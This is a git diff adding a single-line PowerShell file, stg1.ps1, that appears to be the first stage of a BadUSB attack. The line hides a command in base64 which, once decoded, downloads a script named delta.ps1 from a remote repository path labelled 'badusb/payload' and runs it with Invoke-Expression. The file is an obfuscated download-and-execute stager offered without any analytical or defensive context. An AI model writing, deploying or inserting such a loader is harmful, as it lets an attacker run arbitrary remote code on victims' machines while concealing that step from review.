diff --git a/stg1.ps1 b/stg1.ps1 new file mode 100644 index 0000000..af2ea38 --- /dev/null +++ b/stg1.ps1 @@ -0,0 +1 @@ +$fgh = "SUVYIChJV1IgImh0dHBzOi8vZ2l0ZWEub3J5a3Mub3JnL2JhZHVzYi9wYXlsb2FkL3Jhdy9icmFuY2gvbWFpbi9kZWx0YS5wczEiIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ="; $jkl = [System.Convert]::FromBase64String($fgh); $iop = [System.Text.Encoding]::UTF8.GetString($jkl); IEX ($iop) \ No newline at end of file